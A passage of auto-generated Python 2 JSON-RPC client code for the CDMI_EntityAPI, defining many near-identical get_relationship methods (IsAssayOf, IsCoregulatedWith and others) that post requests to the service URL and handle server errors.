def get_relationship_HasLevelsFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasLevelsFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Involves(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Involves',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInvolvedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInvolvedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsAnnotatedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsAnnotatedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Annotates(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Annotates',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsAssayOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsAssayOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsAssayedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsAssayedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsClassFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsClassFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInClass(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInClass',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsCollectionOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsCollectionOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsCollectedInto(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsCollectedInto',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsComposedOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsComposedOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsComponentOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsComponentOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsComprisedOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsComprisedOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Comprises(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Comprises',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsConfiguredBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsConfiguredBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ReflectsStateOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ReflectsStateOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsConservedDomainModelFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsConservedDomainModelFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasConservedDomainModel(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasConservedDomainModel',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsConsistentWith(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsConsistentWith',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsConsistentTo(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsConsistentTo',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsContextOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsContextOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasEnvironment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasEnvironment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsCoregulatedWith(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsCoregulatedWith',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasCoregulationWith(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasCoregulationWith',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsCoupledTo(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsCoupledTo',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsCoupledWith(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsCoupledWith',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsDatasetFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsDatasetFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasAssociationDataset(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasAssociationDataset',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsDeterminedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsDeterminedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Determines(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Determines',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsDividedInto(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsDividedInto',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsDivisionOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsDivisionOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsExecutedAs(self, ids, from_fields, rel_fields, to_fields):
